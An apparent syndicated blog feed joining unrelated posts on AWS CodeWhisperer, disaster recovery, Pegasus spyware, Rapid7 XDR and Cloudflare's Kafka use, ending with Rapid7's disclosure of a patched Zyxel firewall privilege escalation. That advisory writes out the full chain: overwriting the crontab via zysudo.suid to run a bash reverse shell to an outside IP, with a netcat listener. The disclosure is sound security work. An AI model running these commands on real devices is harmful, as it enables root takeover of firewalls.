Introducing Amazon CodeWhisperer in the AWS Lambda console (In preview)

Post Syndicated from Julian Wood original https://aws.amazon.com/blogs/compute/introducing-amazon-codewhisperer-in-the-aws-lambda-console-in-preview/

This blog post is written by Mark Richman, Senior Solutions Architect.

Today, AWS is launching a new capability to integrate the Amazon CodeWhisperer experience with the AWS Lambda console code editor.

Amazon CodeWhisperer is a machine learning (ML)–powered service that helps improve developer productivity. It generates code recommendations based on their code comments written in natural language and code.

CodeWhisperer is available as part of the AWS toolkit extensions for major IDEs, including JetBrains, Visual Studio Code, and AWS Cloud9, currently supporting Python, Java, and JavaScript. In the Lambda console, CodeWhisperer is available as a native code suggestion feature, which is the focus of this blog post.

CodeWhisperer is currently available in preview with a waitlist. This blog post explains how to request access to and activate CodeWhisperer for the Lambda console. Once activated, CodeWhisperer can make code recommendations on-demand in the Lambda code editor as you develop your function. During the preview period, developers can use CodeWhisperer at no cost.

Amazon CodeWhisperer

Amazon CodeWhisperer

Lambda is a serverless compute service that runs your code in response to events and automatically manages the underlying compute resources for you. You can trigger Lambda from over 200 AWS services and software as a service (SaaS) applications and only pay for what you use.

With Lambda, you can build your functions directly in the AWS Management Console and take advantage of CodeWhisperer integration. CodeWhisperer in the Lambda console currently supports functions using the Python and Node.js runtimes.

When writing AWS Lambda functions in the console, CodeWhisperer analyzes the code and comments, determines which cloud services and public libraries are best suited for the specified task, and recommends a code snippet directly in the source code editor. The code recommendations provided by CodeWhisperer are based on ML models trained on a variety of data sources, including Amazon and open source code. Developers can accept the recommendation or simply continue to write their own code.

Requesting CodeWhisperer access

CodeWhisperer integration with Lambda is currently available as a preview only in the N. Virginia (us-east-1) Region. To use CodeWhisperer in the Lambda console, you must first sign up to access the service in preview here or request access directly from within the Lambda console.

In the AWS Lambda console, under the Code tab, in the Code source editor, select the Tools menu, and Request Amazon CodeWhisperer Access.

Request CodeWhisperer access in Lambda console

Request CodeWhisperer access in Lambda console

You may also request access from the Preferences pane.

Request CodeWhisperer access in Lambda console preference pane

Request CodeWhisperer access in Lambda console preference pane

Selecting either of these options opens the sign-up form.

CodeWhisperer sign up form

CodeWhisperer sign up form

Enter your contact information, including your AWS account ID. This is required to enable the AWS Lambda console integration. You will receive a welcome email from the CodeWhisperer team upon once they approve your request.

Activating Amazon CodeWhisperer in the Lambda console

Once AWS enables your preview access, you must turn on the CodeWhisperer integration in the Lambda console, and configure the required permissions.

From the Tools menu, enable Amazon CodeWhisperer Code Suggestions

Enable CodeWhisperer code suggestions

Enable CodeWhisperer code suggestions

You can also enable code suggestions from the Preferences pane:

Enable CodeWhisperer code suggestions from Preferences pane

Enable CodeWhisperer code suggestions from Preferences pane

The first time you activate CodeWhisperer, you see a pop-up containing terms and conditions for using the service.

CodeWhisperer Preview Terms

CodeWhisperer Preview Terms

Read the terms and conditions and choose Accept to continue.

AWS Identity and Access Management (IAM) permissions

For CodeWhisperer to provide recommendations in the Lambda console, you must enable the proper AWS Identity and Access Management (IAM) permissions for either your IAM user or role. In addition to Lambda console editor permissions, you must add the codewhisperer:GenerateRecommendations permission.

Here is a sample IAM policy that grants a user permission to the Lambda console as well as CodeWhisperer:

{
  "Version": "2012-10-17",
  "Statement": [{
      "Sid": "LambdaConsolePermissions",
      "Effect": "Allow",
      "Action": [
        "lambda:AddPermission",
        "lambda:CreateEventSourceMapping",
        "lambda:CreateFunction",
        "lambda:DeleteEventSourceMapping",
        "lambda:GetAccountSettings",
        "lambda:GetEventSourceMapping",
        "lambda:GetFunction",
        "lambda:GetFunctionCodeSigningConfig",
        "lambda:GetFunctionConcurrency",
        "lambda:GetFunctionConfiguration",
        "lambda:InvokeFunction",
        "lambda:ListEventSourceMappings",
        "lambda:ListFunctions",
        "lambda:ListTags",
        "lambda:PutFunctionConcurrency",
        "lambda:UpdateEventSourceMapping",
        "iam:AttachRolePolicy",
        "iam:CreatePolicy",
        "iam:CreateRole",
        "iam:GetRole",
        "iam:GetRolePolicy",
        "iam:ListAttachedRolePolicies",
        "iam:ListRolePolicies",
        "iam:ListRoles",
        "iam:PassRole",
        "iam:SimulatePrincipalPolicy"
      ],
      "Resource": "*"
    },
    {
      "Sid": "CodeWhispererPermissions",
      "Effect": "Allow",
      "Action": ["codewhisperer:GenerateRecommendations"],
      "Resource": "*"
    }
  ]
}

This example is for illustration only. It is best practice to use IAM policies to grant restrictive permissions to IAM principals to meet least privilege standards.

Demo

To activate and work with code suggestions, use the following keyboard shortcuts:

  • Manually fetch a code suggestion: Option+C (macOS), Alt+C (Windows)
  • Accept a suggestion: Tab
  • Reject a suggestion: ESC, Backspace, scroll in any direction, or keep typing and the recommendation automatically disappears.

Currently, the IDE extensions provide automatic suggestions and can show multiple suggestions. The Lambda console integration requires a manual fetch and shows a single suggestion.

Here are some common ways to use CodeWhisperer while authoring Lambda functions.

Single-line code completion

When typing single lines of code, CodeWhisperer suggests how to complete the line.

CodeWhisperer single-line completion

CodeWhisperer single-line completion

Full function generation

CodeWhisperer can generate an entire function based on your function signature or code comments. In the following example, a developer has written a function signature for reading a file from Amazon S3. CodeWhisperer then suggests a full implementation of the read_from_s3 method.

CodeWhisperer full function generation

CodeWhisperer full function generation

CodeWhisperer may include import statements as part of its suggestions, as in the previous example. As a best practice to improve performance, manually move these import statements to outside the function handler.

Generate code from comments

CodeWhisperer can also generate code from comments. The following example shows how CodeWhisperer generates code to use AWS APIs to upload files to Amazon S3. Write a comment describing the intended functionality and, on the following line, activate the CodeWhisperer suggestions. Given the context from the comment, CodeWhisperer first suggests the function signature code in its recommendation.

CodeWhisperer generate function signature code from comments

CodeWhisperer generate function signature code from comments

After you accept the function signature, CodeWhisperer suggests the rest of the function code.

CodeWhisperer generate function code from comments

CodeWhisperer generate function code from comments

When you accept the suggestion, CodeWhisperer completes the entire code block.

CodeWhisperer generates code to write to S3.

CodeWhisperer generates code to write to S3.

CodeWhisperer can help write code that accesses many other AWS services. In the following example, a code comment indicates that a function is sending a notification using Amazon Simple Notification Service (SNS). Based on this comment, CodeWhisperer suggests a function signature.

CodeWhisperer function signature for SNS

CodeWhisperer function signature for SNS

If you accept the suggested function signature. CodeWhisperer suggest a complete implementation of the send_notification function.

CodeWhisperer function send notification for SNS

CodeWhisperer function send notification for SNS

The same procedure works with Amazon DynamoDB. When writing a code comment indicating that the function is to get an item from a DynamoDB table, CodeWhisperer suggests a function signature.

CodeWhisperer DynamoDB function signature

CodeWhisperer DynamoDB function signature

When accepting the suggestion, CodeWhisperer then suggests a full code snippet to complete the implementation.

CodeWhisperer DynamoDB code snippet

CodeWhisperer DynamoDB code snippet

Once reviewing the suggestion, a common refactoring step in this example would be manually moving the references to the DynamoDB resource and table outside the get_item function.

CodeWhisperer can also recommend complex algorithm implementations, such as Insertion sort.

CodeWhisperer insertion sort.

CodeWhisperer insertion sort.

As a best practice, always test the code recommendation for completeness and correctness.

CodeWhisperer not only provides suggested code snippets when integrating with AWS APIs, but can help you implement common programming idioms, including proper error handling.

Conclusion

CodeWhisperer is a general purpose, machine learning-powered code generator that provides you with code recommendations in real time. When activated in the Lambda console, CodeWhisperer generates suggestions based on your existing code and comments, helping to accelerate your application development on AWS.

To get started, visit https://aws.amazon.com/codewhisperer/. Share your feedback with us at [email protected].

For more serverless learning resources, visit Serverless Land.

Server Backup 101: Disaster Recovery Planning

Post Syndicated from Kari Rivas original https://www.backblaze.com/blog/server-backup-101-disaster-recovery-planning/

In any business, time is money. What may shock you is how much money that time is actually worth. According to Gartner, the average cost of one hour of downtime for a business is roughly $300,000. That’s $5,600 a minute. Multiply that out by the amount of time it takes to recover from data theft, sabotage, or a natural disaster, and you could easily be looking at millions of dollars in lost revenue. That is, unless you’ve planned ahead with an effective disaster recovery plan.

Even one hour of lost time due to a cyberattack or natural disaster could adversely affect your business operations. Read on to learn how to develop an effective disaster recovery plan so you can quickly rebound no matter what happens, including:

  • Knowing what a disaster recovery plan is and why you need it.
  • Developing an effective strategy.
  • Identifying key roles.
  • Prioritizing business operations and objectives.
  • Deploying backups.

What Is a Disaster Recovery Plan?

A disaster recovery plan is made up of resources and processes that a business can use to restore apps, data, digital assets, equipment, and network operations in the event of any unplanned disruption.

Events such as natural disasters (floods, fires, earthquakes, etc.), theft, and cybercrime often interrupt business operations or restrict access to data. The goal of a disaster recovery plan is to get back up and running as quickly and smoothly as possible.

Some companies will choose to write their own disaster recovery plans, while others may contract with a managed service provider (MSP) specializing in disaster recovery as a service (DRaaS). Either way, crafting a disaster recovery plan that covers you for any contingency is crucial.

Why Do You Need a Disaster Recovery Plan?

A disaster recovery plan is not just a good idea, it is an essential component of your business. Cybercrime is on the rise, targeting small and medium-sized businesses just as often as large corporations. According to Cybersecurity Magazine, 43% of recent data breaches affected small and medium-sized businesses. Additionally, you could be cut off from your data by power outages, hardware failure, data corruption, and natural occurrences that restrict IT workflows. So, why do you need a disaster recovery plan? A few key benefits rise to the top:

  • Your disaster recovery plan will ensure business continuity in the case of a disaster. Imagine the confidence of knowing that no matter what happens, your business is prepared and can continue operations seamlessly.
  • An effective disaster recovery plan will help you get back up and running faster and more efficiently.
  • The plan also helps to communicate to your entire team, from top to bottom, what to do in the event of an emergency.

Writing a Disaster Recovery Plan: What Should Your Disaster Recovery Plan Include?

A solid disaster recovery plan should include five main elements, which we’ll detail below:

  1. An effective strategy.
  2. Key team members who can carry out the plan.
  3. Clear objectives and priorities.
  4. Solid backups.
  5. Testing protocols.

An Effective Strategy

One of the most critical aspects of your disaster recovery plan should be your strategy. Typically, the details of a disaster recovery plan include steps for prevention, preparation, mitigation, and recovery. Think about both the big picture and fine details when putting together the pieces.

Disaster Recovery Planning Case Study: Santa Cruz Skateboards

Santa Cruz Skateboards safeguarded decades worth of data with a disaster recovery plan and backups to prevent loss from the threat of tsunamis on the California coast. Read more about how they did it.

Some tips for creating an effective strategy include:

  • Identify possible disasters. Consider the types of disasters your business may encounter and design your plan around those. Every business is susceptible to cybercrime, which should be a significant component of your plan. If your business is located in a disaster prone location, let that dictate your plan objectives.
  • Plan for “minor” disasters. A “major” disaster like an earthquake could take out the entire office and on-premises infrastructure, but “minor” disasters can also be disruptive. Good employees make mistakes and delete things, and bad employees sometimes make worse mistakes. A disaster recovery plan protects you from those “minor” disasters as well.
  • Create multiple disaster recovery plans. You may need to create different versions of your disaster recovery plan based on specific scenarios and the severity of the disaster. For example, you may need a plan that responds to a cyberattack and restores data quickly, while another plan may deal with hardware destruction and replacement rather than data restoration.
  • Plan from your recovery backward. Think about what you need to accomplish with your disaster recovery and plan your backup routine to support it. Then, after your plan is written, go back and ensure that your backup routine follows the plan initiatives and accomplishes the goals in an acceptable time frame.
  • Develop KPIs. Include critical key performance indicators (KPIs) in the plan, such as a recovery time objective (RTO) and recovery point objective (RPO). RTO refers to how quickly you intend to restore your systems after a disaster, and RPO is the maximum amount of data loss you can safely incur.

Establish the Key Team Members and Their Roles and Hierarchy

Another crucial component of your disaster recovery plan is identifying key team members to carry out the instructions. You must clearly define roles and hierarchy for effectiveness. Consider the following when building your disaster recovery team:

  • Communicate roles and hierarchy. Ensure that each team member knows their role in the plan and understands where they land in the hierarchy. Build in redundancy if a major player is unavailable.
  • Develop a master contact list. Create a master list with updated contact information for each team member and update it regularly as things change. Be sure the list includes everyone’s cell phone and landline numbers (if applicable) and emergency contacts for each person. Don’t assume you will have working internet and consider alternative ways to reach critical team members in the middle of the night.
  • Plan on how to manage your team. Think about how you will stay organized and manage your team to function 24/7 until you resolve the disaster.

Prioritize Business Operations and Objectives

Another important aspect of your disaster recovery plan is prioritizing business operations and objectives and crafting your plan around those.

Identify the most critical aspects of the business that need to be restored first. Then, focus on those and leave the less essential things until later. Understand that it is not feasible to restore everything at once. Instead, you must prioritize the most critical business areas and get those up and running and then, other, less crucial parts of the system. Detail these priorities in your plan so that no one wastes time on nonessential operations.

Know How to Deploy Your Backups

Backups should be a routine function for your organization, and you should know them inside and out. Be sure to familiarize yourself with every aspect of the backup process, including where data is stored, how recent it is, and how to restore it at a moment’s notice.

Having a reliable backup plan could save your business. You don’t want to waste precious time figuring out where the latest backup is, where it’s stored (whether that’s locally or on the cloud), or how to access it. Off-site cloud storage is a safe, reliable way to store and retrieve your data, especially in the event of a disaster.

Practice restoring your backups regularly to test their viability. Document the process for restoring in case you are unavailable and someone else has to take over. Data restoration should be a central part of your disaster recovery plan. Remember, backups are not your entire disaster recovery plan but only a piece of the overall system.

Foolproof Your Plan With Disaster Recovery Testing

The best-laid plans don’t always work out. Therefore, it’s essential that you foolproof your disaster recovery plan by testing it regularly (once a year, or every six months, whatever works for you). You don’t have to experience a real catastrophe; you can simulate what a disaster would look like and run through the entire process to ensure everything works as expected. Some disaster recovery testing best practices include:

  • Planning for the worst-case scenario. Think about things like access to a car, how you will get to the office, and how you will access your backups if they are stored online and you don’t have internet? Prepare by having multiple alternate plans (A, B, C, etc.). Remember, disasters come in all shapes and sizes so, be prepared to think outside the box. When the COVID-19 pandemic started, businesses had to scramble to adjust. Prepare for anything, even minor disruptions or cut-offs from resources you rely on.
  • Securing resources in advance. If you need resources to make it work, such as budgetary funds, software, hardware, or services, get those approved now so you’re not stuck provisioning necessary resources in the middle of a disaster.
  • Regularly reviewing and updating your disaster recovery plan as things change. Team members come and go, so schedule routine updates every three to six months to ensure that everything is up to date and viable.
  • Distributing copies of your disaster recovery plan. All staff members, including executives, should have a copy of your plan, and you should clearly communicate how it works and what everyone’s responsibility is.
  • Conducting post mortems after training and simulations (or a real disaster) to determine what works and what doesn’t. Make changes to your plan accordingly.

Don’t wait until a disaster occurs before writing your disaster recovery plan. A disaster recovery plan is an ever-evolving process you must maintain as the business changes and grows so you can face anything that the future brings.

Disaster Recovery, Done.

Ready to check disaster recovery off your list? Check out our Instant Recovery in Any Cloud solution that you can use as part of your disaster recovery plan. You can run a single command to instantly see your servers, data, firewalls, and network storage. Get back up and running as soon as possible with minimal disruption and expense to your business.

The post Server Backup 101: Disaster Recovery Planning appeared first on Backblaze Blog | Cloud Storage & Cloud Backup.

NSO Group’s Pegasus Spyware Used against Thailand Pro-Democracy Activists and Leaders

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2022/07/nso-groups-pegasus-spyware-used-against-thailand-pro-democracy-activists-and-leaders.html

Yet another basic human rights violation, courtesy of NSO Group: Citizen Lab has the details:

Key Findings

  • We discovered an extensive espionage campaign targeting Thai pro-democracy protesters, and activists calling for reforms to the monarchy.
  • We forensically confirmed that at least 30 individuals were infected with NSO Group’s Pegasus spyware.
  • The observed infections took place between October 2020 and November 2021.
  • The ongoing investigation was triggered by notifications sent by Apple to Thai civil society members in November 2021. Following the notification, multiple recipients made contact with civil society groups, including the Citizen Lab.
  • The report describes the results of an ensuing collaborative investigation by the Citizen Lab, and Thai NGOs iLaw, and DigitalReach.
  • A sample of the victims was independently analyzed by Amnesty International’s Security Lab which confirms the methodology used to determine Pegasus infections.

[…]

NSO Group has denied any wrongdoing and maintains that its products are to be used “in a legal manner and according to court orders and the local law of each country.” This justification is problematic, given the presence of local laws that infringe on international human rights standards and the lack of judicial oversight, transparency, and accountability in governmental surveillance, which could result in abuses of power. In Thailand, for example, Section 112 of the Criminal Code (also known as the lèse-majesté law), which criminalizes defamation, insults, and threats to the Thai royal family, has been criticized for being “fundamentally incompatible with the right to freedom of expression,” while the amended Computer Crime Act opens the door to potential rights violations, as it “gives overly broad powers to the government to restrict free speech [and] enforce surveillance and censorship.” Both laws have been used in concert to prosecute lawyers and activists, some of whom were targeted with Pegasus.

More details. News articles.

A few months ago, Ronan Farrow wrote a really good article on NSO Group and its problems. The company was itself hacked in 2021.

L3Harris Corporation was looking to buy NSO Group, but dropped its bid after the Biden administration expressed concerns. The US government blacklisted NSO Group last year, and the company is even more toxic than it was as a result—and a mess internally.

In another story, the nephew of jailed Hotel Rwanda dissident was also hacked by Pegasus.

EDITED TO ADD (7/28): The House Intelligence Committee held hearings on what to do about this rogue industry. It’s important to remember that while NSO Group gets all the heat, there are many other companies that do the same thing.

John-Scott Railton at the hearing:

If NSO Group goes bankrupt tomorrow, there are other companies, perhaps seeded with U.S. venture capital, that will attempt to step in to fill the gap. As long as U.S. investors see the mercenary spyware industry as a growth market, the U.S. financial sector is poised to turbocharge the problem and set fire to our collective cybersecurity and privacy.

Gimme! Gimme! Gimme! (More Data): What Security Pros Are Saying

Post Syndicated from Dina Durutlic original https://blog.rapid7.com/2022/07/19/gimme-gimme-gimme-more-data-what-security-pros-are-saying/

Gimme! Gimme! Gimme! (More Data): What Security Pros Are Saying

Eight in 10 organizations collect, process, and analyze security operations data from more than 10 sources, ESG identified in a new ebook SOC Modernization and the Role of XDR, sponsored by Rapid7. Security professionals believe that the most important sources are endpoint security data (24%), threat intelligence feeds (21%), security device logs (20%), cloud posture management data (20%), and network flow logs (18%).

While this seems like a lot of data, survey respondents actually want to use more data for security operations in order to keep up with the proliferation of the attack surface. This expansion is driving the need for scalable, high-performance, cloud-based back-end data repositories.

More data, more noise

Organizations are increasingly investing in technology to achieve executive goals and deliver on digital transformation strategies – every company is becoming a software company in order to remain competitive and support the new work normal.

With more technology comes greater potential for vulnerabilities and threats. Security operations center (SOC) analysts are an organization’s first line of defense. In order to effectively stay ahead of potential threats and attacks, security teams rely on vast amounts of data to get an overview of the organization and ensure protection of any vulnerabilities or threats.

However, it’s nearly impossible for organizations to prioritize and mitigate hundreds of risks effectively – and not just due to the skilled resource and knowledge shortage. Security teams need to filter through the noise and identify the right data to act on.

“In security, what we don’t look at, don’t listen to, don’t evaluate, and don’t act upon may actually be more important than what we do,” Joshua Goldfarb recently wrote in Dark Reading.

Focus on what matters with stronger signal-to-noise

Though SOC analysts are adept at collecting vast amounts of security data, they face a multitude of challenges in discerning the most severe, imminent threats and responding to them in an effective, timely manner. These teams are inundated with low-fidelity data and bogged down with repetitive tasks dealing with false positives. In order to reduce the noise, security professionals need a good signal-to-noise ratio. They need high-fidelity intelligence, actionable insight, and contextual data to quickly identify and respond to threats.

With Rapid7, organizations can ensure visibility for their security teams, eliminating blindspots and extinguishing threats earlier and faster. InsightIDR, Rapid7’s cloud-native SIEM and XDR, provides SOC analysts with comprehensive detection and response.

With InsightIDR, security professionals can leverage complete coverage with a native endpoint agent, network sensors, collectors, and APIs. Teams can go beyond unifying data to correlate, attribute, and enrich diverse datasets into a single harmonious picture.

  • Detailed events and investigations Track users and assets as they move around the network, auto-enriching every log line.
  • Correlation across diverse telemetry – Single investigation timeline for each alert, and all the details of an attack in one place.
  • Expert response recommendations – Alerts come with recommended actions from Rapid7’s global MDR SOC and Velociraptor’s digital forensics and incident response playbooks.

Additional reading:

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Using Apache Kafka to process 1 trillion messages

Post Syndicated from Matt Boyle original https://blog.cloudflare.com/using-apache-kafka-to-process-1-trillion-messages/

Using Apache Kafka to process 1 trillion messages

Using Apache Kafka to process 1 trillion messages

Cloudflare has been using Kafka in production since 2014. We have come a long way since then, and currently run 14 distinct Kafka clusters, across multiple data centers, with roughly 330 nodes. Between them, over a trillion messages have been processed over the last eight years.

Cloudflare uses Kafka to decouple microservices and communicate the creation, change or deletion of various resources via a common data format in a fault-tolerant manner. This decoupling is one of many factors that enables Cloudflare engineering teams to work on multiple features and products concurrently.

We learnt a lot about Kafka on the way to one trillion messages, and built some interesting internal tools to ease adoption that will be explored in this blog post. The focus in this blog post is on inter-application communication use cases alone and not logging (we have other Kafka clusters that power the dashboards where customers view statistics that handle more than one trillion messages each day). I am an engineer on the Application Services team and our team has a charter to provide tools/services to product teams, so they can focus on their core competency which is delivering value to our customers.

In this blog I’d like to recount some of our experiences in the hope that it helps other engineering teams who are on a similar journey of adopting Kafka widely.

Tooling

One of our Kafka clusters is creatively named Messagebus. It is the most general purpose cluster we run, and was created to:

  • Prevent data silos;
  • Enable services to communicate more clearly with basically zero integration cost (more on how we achieved this below);
  • Encourage the use of a self-documenting communication format and therefore removing the problem of out of date documentation.

To make it as easy to use as possible and to encourage adoption, the Application Services team created two internal projects. The first is unimaginatively named Messagebus-Client. Messagebus-Client is a Go library that wraps the fantastic Shopify Sarama library with an opinionated set of configuration options and the ability to manage the rotation of mTLS certificates.

Using Apache Kafka to process 1 trillion messages

The success of this project is also somewhat its downfall. By providing a ready-to-go Kafka client, we ensured teams got up and running quickly, but we also abstracted some core concepts of Kafka a little too much, meaning that small unassuming configuration changes could have a big impact.

One such example led to partition skew (a large portion of messages being directed towards a single partition, meaning we were not processing messages in real time; see the chart below). One drawback of Kafka is you can only have one consumer per partition, so when incidents do occur, you can’t trivially scale your way to faster throughput.

That also means before your service hits production it is wise to do some back of the napkin math to figure out what throughput might look like, otherwise you will need to add partitions later. We have since amended our library to make events like the below less likely.

Using Apache Kafka to process 1 trillion messages

The reception for the Messagebus-Client has been largely positive. We spent time as a team to understand what the predominant use cases were, and took the concept one step further to build out what we call the connector framework.

Connectors

The connector framework is based on Kafka-connectors and allows our engineers to easily spin up a service that can read from a system of record and push it somewhere else (such as Kafka, or even Cloudflare’s own Quicksilver). To make this as easy as possible, we use Cookiecutter templating to allow engineers to enter a few parameters into a CLI and in return receive a ready to deploy service.

Using Apache Kafka to process 1 trillion messages

We provide the ability to configure data pipelines via environment variables. For simple use cases, we provide the functionality out of the box. However, extending the readers, writers and transformations is as simple as satisfying an interface and “registering” the new entry.

For example, adding the environment variables:

READER=kafka
TRANSFORMATIONS=topic_router:topic1,topic2|pf_edge
WRITER=quicksilver

will:

  • Read messages from Kafka topic “topic1” and “topic2”;
  • Transform the message using a transformation function called “pf_edge” which maps the request from a Kafka protobuf to a Quicksilver request;
  • Write the result to Quicksilver.

Connectors come readily baked with basic metrics and alerts, so teams know they can move to production quickly but with confidence.

Below is a diagram of how one team used our connector framework to read from the Messagebus cluster and write to various other systems. This is orchestrated by a system the Application Service team runs called Communication Preferences Service (CPS). Whenever a user opts in/out of marketing emails or changes their language preferences on cloudflare.com, they are calling CPS which ensures those settings are reflected in all the relevant systems.

Using Apache Kafka to process 1 trillion messages

Strict Schemas

Alongside the Messagebus-Client library, we also provide a repo called Messagebus Schema. This is a schema registry for all message types that will be sent over our Messagebus cluster. For message format, we use protobuf and have been very happy with that decision. Previously, our team had used JSON for some of our kafka schemas, but we found it much harder to enforce forward and backwards compatibility, as well as message sizes being substantially larger than the protobuf equivalent. Protobuf provides strict message schemas (including type safety), the forward and backwards compatibility we desired, the ability to generate code in multiple languages as well as the files being very human-readable.

We encourage heavy commentary before approving a merge. Once merged, we use prototool to do breaking change detection, enforce some stylistic rules and to generate code for various languages (at time of writing it’s just Go and Rust, but it is trivial to add more).

Using Apache Kafka to process 1 trillion messages
An example Protobuf message in our schema

Furthermore, in Messagebus Schema we store a mapping of proto messages to a team, alongside that team’s chat room in our internal communication tool. This allows us to escalate issues to the correct team easily when necessary.

One important decision we made for the Messagebus cluster is to only allow one proto message per topic. This is configured in Messagebus Schema and enforced by the Messagebus-Client. This was a good decision to enable easy adoption, but it has led to numerous topics existing. When you consider that for each topic we create, we add numerous partitions and replicate them with a replication factor of at least three for resilience, there is a lot of potential to optimize compute for our lower throughput topics.

Observability

Making it easy for teams to observe Kafka is essential for our decoupled engineering model to be successful. We therefore have automated metrics and alert creation wherever we can to ensure that all the engineering teams have a wealth of information available to them to respond to any issues that arise in a timely manner.

We use Salt to manage our infrastructure configuration and follow a Gitops style model, where our repo holds the source of truth for the state of our infrastructure. To add a new Kafka topic, our engineers make a pull request into this repo and add a couple of lines of YAML. Upon merge, the topic and an alert for high lag (where lag is defined as the difference in time between the last committed offset being read and the last produced offset being produced) will be created. Other alerts can (and should) be created, but this is left to the discretion of application teams. The reason we automatically generate alerts for high lag is that this simple alert is a great proxy for catching a high amount of issues including:

  • Your consumer isn’t running.
  • Your consumer cannot keep up with the amount of throughput or there is an anomalous amount of messages being produced to your topic at this time.
  • Your consumer is misbehaving and not acknowledging messages.

For metrics, we use Prometheus and display them with Grafana. For each new topic created, we automatically provide a view into production rate, consumption rate and partition skew by producer/consumer. If an engineering team is called out, within the alert message is a link to this Grafana view.

Using Apache Kafka to process 1 trillion messages

In our Messagebus-Client, we expose some metrics automatically and users get the ability to extend them further. The metrics we expose by default are:

For producers:

  • Messages successfully delivered.
  • Message failed to deliver.

For consumer:

  • Messages successfully consumed.
  • Message consumption errors.

Some teams use these for alerting on a significant change in throughput, others use them to alert if no messages are produced/consumed in a given time frame.

A Practical Example

As well as providing the Messagebus framework, the Application Services team looks for common concerns within Engineering and looks to solve them in a scalable, extensible way which means other engineering teams can utilize the system and not have to build their own (thus meaning we are not building lots of disparate systems that are only slightly different).

One example is the Alert Notification System (ANS). ANS is the backend service for the “Notifications” tab in the Cloudflare dashboard. You may have noticed over the past 12 months that new alert and policy types have been made available to customers very regularly. This is because we have made it very easy for other teams to do this. The approach is:

  • Create a new entry into ANS’s configuration YAML (We use CUE lang to validate the configuration as part of our continuous integration process);
  • Import our Messagebus-Client into your code base;
  • Emit a message to our alert topic when an event of interest takes place.

That’s it! The producer team now has a means for customers to configure granular alerting policies for their new alert that includes being able to dispatch them via Slack, Google Chat or a custom webhook, PagerDuty or email (by both API and dashboard). Retrying and dead letter messages are managed for them, and a whole host of metrics are made available, all by making some very small changes.

Using Apache Kafka to process 1 trillion messages

What’s Next?

Usage of Kafka (and our Messagebus tools) is only going to increase at Cloudflare as we continue to grow, and as a team we are committed to making the tooling around Messagebus easy to use, customizable where necessary and (perhaps most importantly) easy to observe. We regularly take feedback from other engineers to help improve the Messagebus-Client (we are on the fifth version now) and are currently experimenting with abstracting the intricacies of Kafka away completely and allowing teams to use gRPC to stream messages to Kafka. Blog post on the success/failure of this to follow!

If you’re interested in building scalable services and solving interesting technical problems, we are hiring engineers on our team in Austin, and Remote US.

CVE-2022-30526 (Fixed): Zyxel Firewall Local Privilege Escalation

Post Syndicated from Jake Baines original https://blog.rapid7.com/2022/07/19/cve-2022-30526-fixed-zyxel-firewall-local-privilege-escalation/

CVE-2022-30526 (Fixed): Zyxel Firewall Local Privilege Escalation

Rapid7 discovered a local privilege escalation vulnerability affecting Zyxel firewalls. The vulnerability allows a low privileged user, such as nobody, to escalate to root on affected firewalls. To exploit this vulnerability, a remote attacker must first establish shell access on the firewall, for example by exploiting CVE-2022-30525.

The following table contains the known affected models.

Affected Model
USG FLEX 100, 100W, 200, 500, 700
USG20-VPN, USG20W-VPN
ATP 100, 200, 500, 700, 800
VPN 50, 100, 300, 1000

Patching CVE-2022-30525 and removing the firewall administration interface from the internet should significantly reduce the risk of this vulnerability being exploited.

Product Description

The affected firewalls are advertised for both small branch and corporate headquarter deployments. They offer VPN solutions, SSL inspection, web filtering, intrusion protection, email security, and advertise up to 5 Gbps throughput through the firewall.

CVE-2022-30526: Local Privilege Escalation

In our previous disclosure of CVE-2022-30525, we demonstrated an attack that allowed a remote and unauthenticated attacker to execute commands as nobody. CVE-2022-30526 allows nobody to become root. This is achieved using a suid binary named zysudo.suid.

bash-5.1$ zysudo.suid
zysudo.suid
Usage: zysudo.suid <command> <arg1> <arg2> ...
	The maximum number of argument is 16

zysudo.suid allows a low privileged user to execute an allow-list of commands with root privileges. The allow list is fairly long:

/sbin/iptables -L
/sbin/ip6tables -L
/sbin/ipset -L
/bin/touch
/bin/rm -f
/bin/rm
/usr/bin/zip
/bin/mv
/bin/chmod 777 /tmp
/bin/cat
/bin/echo
/sbin/sysctl
/bin/dmesg
/usr/bin/killall -q -USR1 diagnosed
/usr/bin/killall -q -USR2 diagnosed
/usr/bin/killall -q -SYS diagnosed
/usr/bin/killall -9 resd
/usr/bin/killall -SIGUSR2 zyshd_wd
/bin/kill -0
/usr/bin/gdb
/bin/ls
/usr/bin/pmap
/bin/cp
/bin/chown
/bin/mkdir
/usr/local/bridge-util/brctl show
/bin/ping
/usr/sbin/ping6
/usr/sbin/sdwan_interface
/usr/bin/timeout 10s /usr/bin/openssl s_client -CAfile /share/ztp/certificate/ca_chain.pem -cert /share/ztp/certificate/edge_certificate.pem -key /share/ztp/certificate/edge_privkey.pem -host
/usr/bin/timeout 10s /usr/bin/openssl s_client -CAfile /share/ztp/certificate/ca_chain_f.pem -cert /share/ztp/certificate/edge_certificate_f.pem -key /share/ztp/certificate/edge_privkey_f.pem -host
/usr/sbin/usmgt m
/usr/sbin/usmgt u
/usr/bin/killall -SIGUSR1 pcap_monitor
/usr/bin/killall -SIGUSR2 pcap_monitor
/usr/local/bin/sdwan_log_backup.sh
/usr/bin/zykit_info -n
/usr/local/bin/speedtest
/usr/local/bin/speedtest-cli

The commands are executed using execv so command injection is a concern. The problem is that a few of these commands allow low-privileged attackers to overwrite files with arbitrary content. There are some other bad things in here (e.g. rm) but we’ll focus on file writing.

Much of the firewall’s filesystem is read-only squashfs. Simply modifying a binary that will be executed as root in /bin/, /sbin/ and the like isn’t an option. However, there is at least one file that an attacker can modify in order to reliably escalate to root: /var/zyxel/crontab.

/var/zyxel/crontab is the crontab file used by cron. An attacker can simply append a new job to the end of the crontab to get root privileges:

bash-5.1$ cp /var/zyxel/crontab /tmp/crontab
bash-5.1$ echo -en '#!/bin/bash\n\nexec bash -i &>/dev/tcp/10.0.0.28/1270 <&1\n' > /tmp/exec_me
bash-5.1$ chmod +x /tmp/exec_me
bash-5.1$ echo "* * * * * root /tmp/exec_me" >> /tmp/crontab
bash-5.1$ zysudo.suid /bin/cp /tmp/crontab /var/zyxel/crontab

Above the attacker copies the active crontab to /tmp/. Then they use echo to create a new script called /tmp/exec_me. The new script, when executed, will start a reverse shell to 10.0.0.28:1270. Execution of the new script is appended to /tmp/crontab. Then /var/zyxel/crontab is overwritten with the malicious /tmp/crontab using zysudo.suid. cron will execute the appended command as root within the next 60 seconds:

albinolobster@ubuntu:~$ nc -lvnp 1270
